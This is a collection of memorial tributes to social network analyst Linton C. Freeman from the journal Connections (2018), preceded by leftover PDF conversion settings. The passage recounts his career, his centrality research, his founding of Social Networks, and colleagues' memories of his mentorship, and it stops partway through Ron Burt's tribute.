<FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_zg62yupdxbb5tb2624egapptde ---- Research Collection Other Journal Item A collection of tributes to Linton C. Freeman Author(s): Bernard, Russ; Bienenstock, Elisa; Borgatti, Steve; Brandes, Ulrik; Burt, Ron; Butts, Carter; Doreian, Pat; Fararo, Tom; Faust, Katie; Johnson, Jeff; Kanfer, Alaina M.; Krackhardt, David; Skvoretz, John; Wellman, Barry Publication Date: 2018-07 Permanent Link: https://doi.org/10.3929/ethz-b-000391624 Originally published in: Connections (INSNA) 38(1), http://doi.org/10.21307/connections-2018-003 Rights / License: Creative Commons Attribution 4.0 International This page was generated automatically upon download from the ETH Zurich Research Collection. For more information please consult the Terms of use. ETH Library https://doi.org/10.3929/ethz-b-000391624 http://doi.org/10.21307/connections-2018-003 http://creativecommons.org/licenses/by/4.0/ https://www.research-collection.ethz.ch https://www.research-collection.ethz.ch/terms-of-use 1© 2018 Authors. This work is licensed under the Creative Commons Attribution 4.0 License (https://creativecommons.org/licenses/by/4.0/). CONNECTIONS (INSNA) Issue 1 | Vol. 38Article | DOI: 10.21307/connections-2018-003 A collection of tributes to Linton C. Freeman Russ Bernard, Elisa Bienenstock, Steve Borgatti, Ulrik Brandes, Ron Burt, Carter Butts, Pat Doreian, Tom Fararo, Katie Faust, Jeff Johnson, Alaina Michaelson Kanfer, David Krackhardt, John Skvoretz and Barry Wellman A collection of tributes to Linton C. Freeman This collection of tributes to Linton C. Freeman is meant to remind us that the field of social network analysis is marked by shared connections, intellectual and social, and the role that Lin and Sue, his wife and partner, played in creating them. Lin’s friends, students and colleagues tell us their stories of Lin and through them we learn about Lin the man, the professor, the scientist, the dean, the mentor, the editor, the teacher, the friend, and the networker. The contributors to this collection of tributes are Russ Bernard, Elisa Bienenstock, Steve Borgatti, Ulrik Brandes, Ron Burt, Carter Butts, Pat Doreian, Tom Fararo, Katie Faust, Jeff Johnson, Alaina Mi- chaelson Kanfer, David Krackhardt, John Skvoretz, and Barry Wellman. In Memoriam: Linton C. Freeman Katie Faust and Carter Butts Linton “Lin” Freeman, so- ciology research professor at the University of Califor- nia, Irvine, passed away on August 17, 2018. He was 91. Freeman served as dean of the UCI School of So- cial Sciences from 1979 to 1982. He retired from UCI in 1994 and continued on as a research professor in sociology, teaching courses in social network analy- sis. Prior to his UCI service, Freeman held professor- ships at Syracuse University (1956-67), University of Pittsburgh (1967-69), University of Hawaii (1969-73), and Lehigh University (1973-79) where he was the Lucy G. Moses Distinguished Professor of Sociology. Freeman was a mathematical sociologist whose research focused on social network analysis. He used formal models and network analyses of empirical data to answer questions about how and why groups form. He was author or coauthor of 17 books and more than 100 scholarly articles that appeared in a diverse array of journals including the American Anthropologist, An- imal Behavior, Social Cognition, Social Networks, and Social Forces, to name a few. Lin was born in Chicago in 1927 and grew up near the University of Chicago. He was named after the an- thropologist Ralph Linton, one of his father’s closest friends. As Lin told the story, Ralph was doing field work in Madagascar at the time of Lin’s birth, and his father “somehow managed to embrace a very quaint Victorian notion that it was perfectly all right to take a person’s last name without asking, but you could not take their first name.” So, instead of Ralph Freeman, we had Lin Freeman. Lin was a towering figure in social network analy- sis, one of the pioneers of the field, and a major con- tributor to a wide range of topics in the discipline. It is difficult to find an area of social network analysis that has not been influenced by his work. Lin received his bachelor’s in psychology and soci- ology from Roosevelt University, his master’s in soci- ology and anthropology from the University of Hawaii, and his doctorate in sociology from Northwestern University. His early career is marked by major con- tributions to the study of community decision making and leadership, research done at Syracuse University in collaboration with Morry Sunshine, Sue Freeman, Tom Fararo, and Warner Bloomberg. Late in his long career, Lin outlined his own view of the history of the field in an influential book, The Development of Social Network Analysis: A Study in the Sociology of Science (2004). Written in response 2 A collection of tributes to Linton C. Freeman to the then-fashionable notion that the study of so- cial networks was a “new science,” he mapped out the development of social network analysis starting in the 1930s, noting the many threads that came together to form the field as we know it today. He also described his own early structural research and his epiphany about the common network per- spective that unified otherwise seemingly disparate lines of work. In a recent interview, he described the “mental flip” that he had immediately upon reading Anatol Rapoport’s 1961 paper, “A Study of a Large Sociogram.” In Lin’s words: “[…] mathematical biol- ogy [being done by Rapoport] at Chicago was really sociology […]. He gave us a mathematical founda- tion for thinking about social linkages in structural terms.” Lin’s research on social networks brought that insight to full realization. His contributions on centrality are Lin’s first pub- lications to explicitly embrace all aspects of a social network perspective, and have had a profound and lasting influence on the field. His 1979 article “Centrality in Social Networks: I. Conceptual Clarification” mapped out key distinctions between different approaches for quantifying central- ity and centralization, and established a quorum of formally defined metrics for these concepts that are still the gold standard in the field. Likewise, his work on human social intelligence and perception of social groups contributed both to the systematic collection of network data and to our understanding of how people see social relations and social groups, feeding fruitful lines of research that continue to this day. He made sustained contributions to network visualiza- tion, formalizing the sociological concept of “group,” measurement of dominance hierarchies, and the de- velopment of the field of social networks as a scientif- ic institution. He was one of the early authors of the widely used network analysis software UCINET and published widely on the use of computers in social science in an era when this was a largely untapped frontier. Throughout his career, he helped define re- search directions that would become central con- cerns within the field. Beyond his research contributions, Lin was also a pivotal player in the institutionalization of the field. He founded the flagship journal Social Networks and edited it from 1977 to 2006. This journal was one of the important institutional advances of mid-1970s that helped to consolidate the interdisciplinary field of social networks. The journal continues to be the central outlet for social network research and pro- vides a focal point for contributions from a wide range of disciplines. A careful student of publication practices across disciplines, Lin consciously mod- eled his editorial approach at Social Networks after successful examples in the broader scientific com- munity. His contributions to building social networks as a scientific discipline were also supported by the National Science Foundation-funded Electron- ic Information Exchange System (EIES) experiment, work done in collaboration with Sue Freeman. At the dawn of the internet in 1977-78, this project provid- ed then state-of-the-art computer communications capabilities (phone modems and computer termi- nals) to link several dozen scientists working in the emerging field of social networks. The goal of the experiment was to facilitate exchange of information about the rapidly developing discipline, but it also highlights Lin’s continued fascination with the social context of scientific enterprises. He was also an ac- tive supporter of the International Network for Social Network Analysis (INSNA), the professional organ- ization of the network analysis community, and its flagship meeting, the Sunbelt conference. Some of Lin’s personal predilections (including his passionate advocacy for conference logistics that would allow him to windsurf, as well as his determination that the meeting always be welcoming to newcomers) left a lasting mark on the culture of the conference. Al- ways an evangelist for social network analysis, Lin worked tirelessly to bring new researchers into the field – whatever their home discipline might have been. It is a testimony both to his tenacity and to his charisma that one can to this day find many social network researchers whose entree into the field was an encounter with Lin. Lin’s own exposure to structural and network perspectives started early and ran deep. His father was a genealogist who emphasized the importance of family relations. As an undergraduate at Roo- sevelt University, Lin’s mentor was St. Claire Drake, by all accounts a genuine intellectual and captivat- ing lecturer. Drake had been a student of Allison Davis at the University of Chicago and had worked on the now classic Deep South study (Allison Davis, Burleigh B. Gardner, and Mary R. Gardner, 1941). Drake introduced Lin to the Deep South research in the late 1940s, so at that point Lin would have encountered the quintessential two-mode network of Southern women attending social events (As an aside, decades later Lin published “Finding Social Groups: A Meta-analysis of the Southern Women Data”, a review of more than 20 studies that had analyzed the Davis, Gardner, and Gardner data.). At the University of Hawaii, the geographer For- rest Pitts introduced him to Hägerstrand’s diffusion models and Harry Ball pointed him toward Bavelas and Leavitt’s experimental work on communication 3 CONNECTIONS (INSNA) structures. As a PhD student at Northwestern, Lin was deeply influenced by Don Campbell, who was at the height of his work on reliability, validity, and measurement, themes that continued throughout Lin’s own research. Lin also met Morry Sunshine at Northwestern and they embarked on a very fruitful series of studies of community leadership. Lin iden- tified Morry as someone who was most influential on his thinking and the two remained close friends. Lin moved to UC Irvine in 1979 as Dean of the School of Social Sciences. At UCI he joined an ac- tive group of social network faculty and graduate students, including John Boyd, Doug White, and Lee Sailer. Lin quickly converted others to social net- works, notably Kim Romney and Bill Batchelder, and influenced a steady stream of graduate students (Jeff Johnson, David Krackhardt, Katie Faust, Steve Bor- gatti, Sue Freeman, and Alaina Michaelson Kanfer, to name a few from Lin’s early years at UCI). At the time of his arrival, there were no departments in the School of Social Sciences. Lin’s presence was the catalyst for the formation and steep ascent of the UCI Social Network Research Group, a focal point for re- search and training at Irvine that continues to be ex- tremely active. He also helped establish one of the first systematic graduate curricula in social networks within the Department of Sociology, which has gone on to become the training ground for a large number of doctoral students (both from sociology and from other fields). A member of the Institute for Mathemati- cal Behavioral Sciences, he also boosted the visibility of network-related research within the institute, and was central in recruiting social network researchers to UCI. Lin received a number of awards for his contribu- tions during his career. Among his more notable hon- ors, he held the unique distinction of being a two-time recipient of the Georg Simmel award from the Inter- national Network for Social Network Analysis, and re- ceived the James S. Coleman Distinguished Career Award in Mathematical Sociology from the Mathe- matical Sociology Section of the American Socio- logical Association. In 2002, INSNA named the early career award for contributions to the study of social networks after him, recognizing not only his own re- markable intellectual accomplishments but also his long record of mentoring and supporting young peo- ple. For many junior colleagues who survive him, this is perhaps the most fitting honor for a man who gave so much of his time to encouraging others in their own research. For those who had the good fortune to work closely with him, Lin is remembered as a person of infectious enthusiasm, great intellectual energy, and strong convictions. Never shy about express- ing his opinions – often in forceful language – Lin was always willing to engage in intellectual debate. But he also took criticism graciously, and encour- aged a spirit of no-holds-barred inquiry among his peers that was at once fun, rigorous, and irrever- ent. He brought out the best in his students and his colleagues alike, challenging them to be better sci- entists, to pursue the truth wherever it led, and to enjoy life along the way. He left his mark on the so- cial network field, on UC Irvine, and on all of us who benefited from his presence. Those who travel in the wake of the “Big Kahuna” (so dubbed by a number of his colleagues) have a lot to live up to. But we are richer for his many gifts to us, and, were he here, he would be urging us to sail on to shores he had not yet seen. We hope that our collective voyages do honor to his memory. An open door Jeff Johnson There are many reasons to celebrate the life and career of Lin Freeman. As Cart- er and Katie point out, he has been one of the most influential intellects in social network analysis. But what I most celebrate about Lin was his kindness, open- ness, and, most of all, his mentorship. I believe a sto- ry about my time at UC Ir- vine as a graduate student vividly illustrates this. I was a graduate student from 1975 to 1981. During the latter three years of this Lin was the Dean of the School of Social Scienc- es. The school of social sciences at UCI was itself a unique place. There were no departments and faculty from across the social sciences had offic- es among the seven floors that were assigned in no particular disciplinary pattern. So, a geographer could be next to a political scientist who was next to an economist and so on. This led to a very dif- ferent academic environment. Although I was an anthropologist, I interacted extensively with psy- chologists, economists, sociologists, etc. The Dean before Lin, and eventually Lin, had his office on the 6th floor of the Social Science Tower. Although the Dean’s office had a door that directly accessed the hallway, the door was always shut and any access to the Dean’s office was through an adjoining sec- 4 A collection of tributes to Linton C. Freeman retary’s office, with the secretary as gatekeeper. So as a graduate student before Lin’s time, I had very little interaction, if any, with the Dean (I can’t even remember seeing him). I remember the buzz about the arrival of the new Dean, an athletic look- ing man with a full head of white hair. However, as a graduate student I thought little of it since, as the Who sang, “meet the new boss, same as the old boss.” But these expectations were quickly dashed. Soon after Lin took over as Dean, I would notice the door to the Dean’s office that opened to the hallway was occasionally open, wide open, with Lin often at his desk, at times with his feet on it. I don’t exact- ly remember how it all transpired, but I eventually found myself in his office talking about something networks or something windsurfing or something Hawaii, since both of us had spent time at the Uni- versity of Hawaii. Here I was, a graduate student having conversations with the Dean across a whole range of topics, and not just once, but regularly. I could not have fathomed at the time how unique this really was for a broad range of reasons. A par- ticularly memorable discussion in his office cen- tered on the validity and reliability of respondent’s self-reports of social network interactions. Russ Bernard, Peter Killworth, and Lee Sailer (an Irvine graduate) had just come out with the first of a series of papers on the problem of informant accuracy in the collection of social network data. I remember a number of lively discussions about the topic with Lin and they were incredibly stimulating. Lin would talk about things with conviction and passion and with a style that I would, over the course of my aca- demic life, try to emulate. These discussions about informant accuracy, not just with me but with many others, led to, in my mind, an exciting intellectual period examining many aspects of informant accu- racy that contributed to not only breakthrough’s in social network analysis, but also in the study of cul- ture. Over time the open door was not just limited to Lin’s office. Eventually the door to Lin and Sue Freeman’s house was also open to me. Often when I was in Laguna, where they lived, I would stop by and talk with both Lin and Sue. Their hospitality and mentorship extended well into my academic career. In retrospect both Lin’s and Sue’s kindness and mentorship was a gift. I am now a full professor at a research one univer- sity. I often walk by the office for the Dean of The Col- lege of Arts and Sciences at my university. Despite my advanced status, the Dean’s door is not open. Lin’s open doors are a testament to his character and uniqueness, and a vivid reminder of the human being he was and will always remain in my memory. Forever connected: Linton C. Freeman Alaina Michaelson Kanfer I first met Lin in the summer of 1984, at a new graduate student picnic when Sue Freeman, his wife, ran up to me, grabbed my arm, asserted “you belong with us,” and pulled me over to meet Lin. They were partners; in networks, in science, and in life. That is how I experienced Lin and Sue. And that is how they mentored me, at UC-Irvine and beyond. When Lin was getting impatient for me to final- ize my dissertation topic, I simply could not choose. Should I contribute a methodology for role analysis following Lorrain and White, or should I investigate the how social relationships impact the diffusion of in- novations in the spirit of Ev Rogers? Sue listened pa- tiently and proposed the perfect solution: why not do both? Aha! The role of social relationships in the diffu- sion of a scientific specialty, specifically, role analysis. Thank you, Lin and Sue, for helping me crystalize my lifelong interest in the sociology of science. While he was simply “Lin” with his doors open, and feet on the desk in his Social Science Tower office at UCI, I saw him transform into Linton Freeman the ele- gant speaker at the Sunbelt conferences. In his dress beach clothes (long pants and shoes – sandals) he would saunter into a large packed meeting room. With a booming voice, and piercing eyes that softened into an impish grin he would take the spellbound audience along with him on his intellectual journey to construct a definition, devise a method or discover an answer. Lin was a consummate story-teller. Lin was a great teacher. He could take any task or idea, break it down step by step and communicate it. He was such a good teacher, in fact, that he could take a city-girl from the Midwest, with no athletic abil- ity, and teach her how to race in windsurfing regattas! He would explain how to prepare a meal – kung pao chicken, Korean kalbi, Osso Bucco – with the same precision and enthusiasm as explaining betweenness 5 CONNECTIONS (INSNA) centrality. To this day I cannot peel a tomato in boiling water without thinking of Lin. I think Lin’s skill at teaching stems from his love of the subject, a genuine desire to share, and his focus on simplicity. A simple answer. A simple explanation. Any complex idea could be broken down into sim- pler steps. Lin asserted that the only reason math ap- pears confusing is because the teacher is making it confusing. His explanation for that: Either the teacher doesn’t understand it, or even more nefarious, they make math sound confusing so they can appear smarter! I had the privilege of witnessing clear math communication when I was Sue’s teaching assistant. This was a required course – statistics – and students voluntarily filled the social science lecture hall. They listened, they learned and they enjoyed. Learning to windsurf was so much more impor- tant to me than I imagined. By including me in their beach culture, Lin and Sue modeled a good “work/ life balance.” Never missing an opportunity to study a network, we perfected participant observation data collection on the beach; social networks among windsurfers! But looking back, the most important part of windsurfing was the time it gave me with Lin, driving to and from Dana Point, Doheny Beach, or on more ambitious days, Mission Bay in San Diego. Dur- ing those rides we talked about everything. Lin reg- ularly gave me mini-lectures about his views on how a social group is defined by proximity, similarity, and common fate which he learned from Don Campbell at Northwestern. He was fascinated with the work of Eleanor Rosch on cognition and categorization and spent quite a bit of time trying to figure out how her results translated to social networks. We also talked about the world. About the human race and scary things like nuclear war. Lin reassured me that with every step we take backward, we take two steps forward. This belief has helped sustain me through- out my career as I found myself at the epicenter of revolutionary new technologies, such as the Internet browser and social media, and now genomics, which have the potential for bad, and good. I think Lin was an optimist. As opinionated, and obstinate as Lin appeared, I knew him to be extraordinarily open-minded. He thought I was crazy when I talked about the sense of smell in networks, however, every few years he sent me an article or book implicating olfaction in networks among human and other creatures. The scientific journals in which he chose to publish is a testimony to Lin’s intellectual range, for instance, Journal of Social and Biological Structures, Brain and Behavior Sci- ence, International Journal of Man-Machine Studies as well as classics like American Journal of Sociolo- gy and American Anthropologist, garnering well over 40,000 citations to date according to Google Scholar. All this while he was establishing the journal Social Networks as a conscious effort to transform the field into a normal science. When my life and career veered outside the inner circle of social networks, Lin and Sue’s genuine in- terest in me, my family and my work never waned. Recently, in response to my email updating them on my role at the Carl R. Woese Institute for Genomic Biology, Lin wrote to me, “glad to hear you are still learning. That’s my favorite activity.” Clear thinking, open mindedness, optimism, work/ life balance, and a love of learning, especially when it comes to science. This is what I learned from Lin Freeman, my advisor. I am thankful to him and to Sue for their mentorship and friendship, and I am thankful to the Social Network community for this opportunity to reflect and share. Lin Freeman was my mentor Steve Borgatti I started graduate school (UC-Irvine, School of Social Sciences) in 1978 to study cognitive anthropology. Af- ter a couple of years, I left school to work at a consult- ing company (selling “cultural services”), then moved to a more conventional market- ing research firm, and then came back to school. When I came back, everything was different. The Freemans had arrived. I didn’t take to them right away. They seemed almost too magnificent. It was like having a King and Queen of the School of Social Sciences. And it bothered me that during presentations, they would keep scanning the audience instead of fixing their full attention on the speaker (Little did I know that, just a few years later, they would publish a terrific paper (Freeman, Romney and Freeman, 1987) based on at- tendance at colloquium). Things changed when I moved to an office on the 6th floor of the Social Science Tower, where Lin’s office was located. His door was always open, and there were always people in there, if not forming a cluster at the door. Often the discussion took the form of a debate and was about something scientif- ic, for lack of a better word. I remember at least two days of discussion about discrete versus continuous models of social reality. 6 A collection of tributes to Linton C. Freeman Even though I loved cognitive anthropology, over time, my dissertation became wholly networky, and my advisor Kim Romney booted me over to Lin. Lin was an intense mentor. He had very strong views (or, at least, very strong expressions of views). For exam- ple, I remember him telling me in no uncertain terms that no student of his was going to read mainstream sociology journals: they would rot your brain and crip- ple your thinking. I was also never to use LISREL – a substitute for thinking. And when I said something he didn’t like, he would say NO! with a very expressive combination of hurt, disbelief, and exasperation in his voice. He really cared about what you said and did not tolerate bullshit. Lin never talked to me about my career. He didn’t tell me how to get a job, how to prepare to be a pro- fessor, how to review a paper – anything about the professional side of the business. What he did do was try to develop me intellectually. One of his mentoring techniques was to ask me to look at a measure and see how it related to other measures. The first one he asked me to do was Robinson’s A, which I spent a week analyzing. Another was his own segregation measure S. These exercises were invaluable because they taught you that there are underlying grammars to measures, and obvious locations where different options may be taken. They taught you to see under- lying similarities and differences. Lin once told me with some passion that the most important distinction in social network analysis was R.H. Atkin’s distinction between backcloth and traffic. So I read Atkin (1974) and didn’t understand a word of it. But the distinction and the weight Lin placed on it stuck with me. I now realize that several of my best papers are essentially elaborations of that distinction. What I loved most about Lin were his presenta- tions. There are a lot of great speakers in our field, but Lin was amazing. He had an incredible voice and physical presence, and he had a mesmerizing sto- ry-telling style. I used to sit in on his undergraduate networks class just to hear him tell the foundational tales of our discipline. I especially loved his truly dra- matic reading of the Bavelas-Leavitt experiments. But more than that, a wonderful and important thing about Lin was that his conference presentations were exactly like his classes. The objective was always to explain an idea. Obfuscating, dressing up, over-complicating, name-dropping, reifying, over-promising and p-hack- ing were simply not part of the equation. Many of his talks would begin with a simple observation and start drawing out implications that had gone unnoticed – like a forensic pathologist saying ‘do you see this line here? That could only have come from a large weight attached to the other side of the body [….].” I thank Lin for my career, including everything from the long arm of his social capital to his wax-on wax- off attempts to get me to think deeply and not just sufficiently. Lin Freeman was my mentor. In memoriam: Tribute to Linton Freeman Russ Bernard My introduction to Lin’s wonderful eclectic schol- arship goes back to 1963, when I was a graduate stu- dent of anthropology. I was fascinated by the possibility of using cultures as units of analysis in a statistical study. And so, my intro- duction to Linton Freeman’s work was his 1957 article on using Guttman’s method for scaling societal complexity and then his 1965 book, Elementary Applied Statis- tics. In 1972, when I was working with Peter Killworth at Scripps Institution of Oceanography, in San Diego, I heard about some conferences on network analysis being held in Hawaii by Linton Freeman and realized that was the same Linton Freeman who had written my stats text. Later that year, I went to West Virginia University, in Morgantown and a year later, the Math- ematical Social Science Board of the Social Science Research Council funded my proposal to hold a con- ference on social network analysis at Cheat Lake, West Virginia – a sylvan, idyllic spot near the univer- sity. I was thrilled when Lin accepted my invitation to the conference. By then, Lin was teaching at Lehigh University in Bethlehem, Pennsylvania, about 300 miles from Morgantown, having recently arrived from Dalhousie University in Halifax, Canada. And why was Lin in Halifax? Because, as Lin ex- plained it to me, after four years of living in a lease- hold bungalow on the water in Hawaii, he had no pension and he and Sue had no house. He accepted an endowed chair at Dalhousie and then another at Lehigh within a year. He was, he said, edging his way back to Hawaii. In December 1978, I attended a conference in Ha- waii that Lin had called at the East-West center on the campus of the University in Honolulu and learned that Lin was still trying to get back there. He took several of us out on a Hobey Cat and steered it close to the shore, so we could all see the house he and Sue had lived in while he was at the university there. I still laugh 7 CONNECTIONS (INSNA) every time I remember that scene: Lin waxing poetic, going on about living on the island, water sports, and social networks. In 1979, he and Sue managed to get to California … only about two-thirds of the way back to Hawaii from Halifax, but they did manage to get a really nice house. I miss Lin’s wit and his impatience and his un- relenting enthusiasm for science and for passing it all on. Lin was an inspiring teacher and he never stopped teaching. Even now. Linton Freeman – The networker Barry Wellman Lin Freeman was always at Sunbelt Social Net- work conferences – and always visible – he invaria- bly stood in a central spot outside the meeting rooms schmoozing with whoever came along. I used to be annoyed at Lin because he never, ever came to hear one of our team’s talks. But then I realized that he was doing what he did best – networking with every- one – and mysteriously, he knew what everyone was doing, from his central spot in the hallway. It is only as I write this remembrance that I real- ize that Lin’s key scholarly writing professed what he practiced. He was between us all – at the Sunbelt, on Socnet, and in-person. His most cited scholarly articles by far are about “betweenness”: “Centrality in social networks conceptual clarification” (1978) has 13,862 cites (September 18, 2018), followed by “A set of measures of centrality based on betweenness” (1977) with 6,896 and the later (1991) “Centrality in valued graphs: A measure of betweenness based on network flow” – coauthored with Steve Borgatti and Doug White – with 996. And the second biggest cita- tion is to various forms of the UCINet software (devel- oped with Steve Borgatti, Martin Everett) and others that help us to discover betweenness, et al. among our research subjects. Lin was a networker from before the instant when I first met him. In the early 1970s, he and his wife/ partner Sue Freeman organized an NSF-supported online network of about a score of social network scholars: a listserv before there was such a thing. It turned out we didn’t have much to say to each other on a daily basis, but Lin and Sue were smart enough to organize an in-person meetup at his then-home base of Lehigh so we all bonded in-person as well as online – just at the start of the self-conscious devel- opment of the social network movement. Then, until their sad recent passing, Lin and Sue were a great team – thinking, organizing, and playing together. While the NSF experiment nicely foreshadowed the internet, Lin’s two foremost accomplishments were just beginning. Those at UC Irvine can tell you about Lin’s relentless leadership in forging a strong social network analytic movement there. But to my mind, Lin’s even more important leg- acy was his lead in the mid-1970s in founding and editing our Social Networks journal. He thought of it and secured the contract with Elsevier, when social network analysis was scarcely known. Importantly, Lin lead the way in defining the journal as a broad journal of “structural analysis” – connecting theory and substance with the methodological innovations that social network analysis is sometimes limited to. Betweenness was not a measure – it was a way of thinking. Lin’s work was a key to the mid-1970s transforma- tion of social network analysis from a vague move- ment to a coherent program. It was part of a triad: Lin and the journal working separately but together with Russ Bernard and associates founding the an- nual Sunbelt Social Network conference, and Bev Wellman and I founding INSNA – the International Network for Social Network Analysis. Lin gave his passion to linking social science with mathematics in thinking about social networks. A deep networker, he developed and linked the ideas and people that have helped to define our field broadly and move it forward. And he was a strong supporter of colleagues such as Steve Borgatti, Katie Faust, and Stanley Wasserman as they developed the methodological vocabulary and tools to enable systematic research. I close with a characteristic story: one night the phone rang with Lin on the line. “It turns out that our founding mother, Elizabeth Bott, was raised in Toronto 8 A collection of tributes to Linton C. Freeman by interesting parents. Could you help me find out more?” Yes, I could and the results are in our only written co-production, “A Note on the Ancestral To- ronto Home of Social Network Analysis” – in which we showed that young Elizabeth Bott was the first child to wear a snowsuit (Connections 18, November, 1996: pp. 15-19). This was mostly a Lin show, and it was a treat to work with him. He was a lover of life, ideas, windsurfing, food, mentoring – and ideas. Bev and I fondly recall seeing him at the Sunbelt – net- working in his vividly-colored shirts. “Let’s be serious – but casual,” Lin would say – and role model. Right man, right time Ron Burt Lin Freeman was a man of generosity and scien- tific elegance who found his time. That he no longer walks this earth is a knife to my heart. I am grateful to Katie Faust and Carter Butts for crafting their broad appreciation of Lin. There is left to add only our idio- syncrasies. I highlight two by which I learned to distin- guish and admire Lin. I was first struck by Lin’s generosity. I met Lin in the late 1970s, when I was a new Assistant Professor and he was a Senior Professor at Lehigh University. As Lin describes in his Development of Social Net- work Analysis, social network analysis (SNA) in the 1970s was fragmented, wide open for the application of alternative points of view. It was exciting, but it was also lonely. Lin provided a sense of community. Lin drew you into intellectual challenges that engaged your mind in the company of others similarly challenged. Lin didn’t give you a membership so much as he brokered con- nections between people likely to find one another engaging. The sense of community emerged as a by-product of shared intellectual engagement. Lin did this through his teaching (ask David Krackhart how he got into network analysis), through his conferences (from which I retain so many memories of friendships emergent), and through his journal, Social Networks, and his concomitant early work on bits of software that became UCINET. I was among those who argued with Lin against creating the journal (I and others pre- ferred the goal of taking over a mainstream institution to assert 